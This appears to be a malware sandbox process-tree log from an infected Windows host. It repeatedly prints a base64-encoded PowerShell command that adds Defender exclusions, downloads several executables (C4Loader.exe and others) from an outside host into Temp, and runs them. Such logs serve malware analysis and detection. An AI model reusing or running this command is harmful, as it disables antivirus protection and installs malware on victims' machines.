                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:2588
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2972
                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:2460
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:3000
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:1052
                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:2092
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:2684
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                      PID:2948
                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                          PID:3036
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                              PID:2020
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 88
                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:1672
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                            PID:1588
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                              PID:2620
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
